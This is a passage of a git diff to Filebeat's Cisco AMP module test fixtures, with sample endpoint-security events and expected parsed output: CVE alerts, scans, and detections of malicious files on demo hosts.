+ { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384389977, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:27.000Z", + "file.hash.sha256": "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 61194, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384371995, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:26.000Z", + "file.hash.sha256": "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 62768, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:32:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2017-0106", + "CVE-2017-11774", + "CVE-2017-8506", + "CVE-2017-8507", + "CVE-2017-8571", + "CVE-2017-8663", + "CVE-2018-0791" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2017-0106", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106", + "version": "2016" + }, + { + "cve": "CVE-2017-11774", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774" + }, + { + "cve": "CVE-2017-8506", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506" + }, + { + "cve": "CVE-2017-8507", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507" + }, + { + "cve": "CVE-2017-8571", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571" + }, + { + "cve": "CVE-2017-8663", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663" + }, + { + "cve": "CVE-2018-0791", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193366641599, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T04:32:53.000Z", + "file.hash.sha256": "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc", + "file.name": "OUTLOOK.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 64342, + "process.hash.sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243", + "related.hash": [ + "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:22:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 878000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6525498672153625000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 66455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:07:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696715, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.clean": true, + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.scan.malicious_detections": 0, + "cisco.amp.scan.scanned_files": 2872, + "cisco.amp.scan.scanned_paths": 0, + "cisco.amp.scan.scanned_processes": 49, + "cisco.amp.timestamp_nanoseconds": 928000000, + "event.action": "Scan Completed, No Detections", + "event.dataset": "cisco.amp", + "event.id": 6525494703603843000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 67379, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:06:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696714, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.timestamp_nanoseconds": 537000000, + "event.action": "Scan Started", + "event.dataset": "cisco.amp", + "event.id": 6525494527510184000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 68455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log index ed37c533eac2..ae6c21d78ff0 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log @@ -10,14 +10,6 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":14000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671380737589000,"timestamp":1610706458,"timestamp_nanoseconds":605000000,"date":"2021-01-15T10:27:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":81000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551547","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":60000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551546","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671118744584000,"timestamp":1610706397,"timestamp_nanoseconds":666000000,"date":"2021-01-15T10:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671118744584249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546488","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":274000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670856751579000,"timestamp":1610706336,"timestamp_nanoseconds":880000000,"date":"2021-01-15T10:25:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670856751579190","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} @@ -46,917 +38,5 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 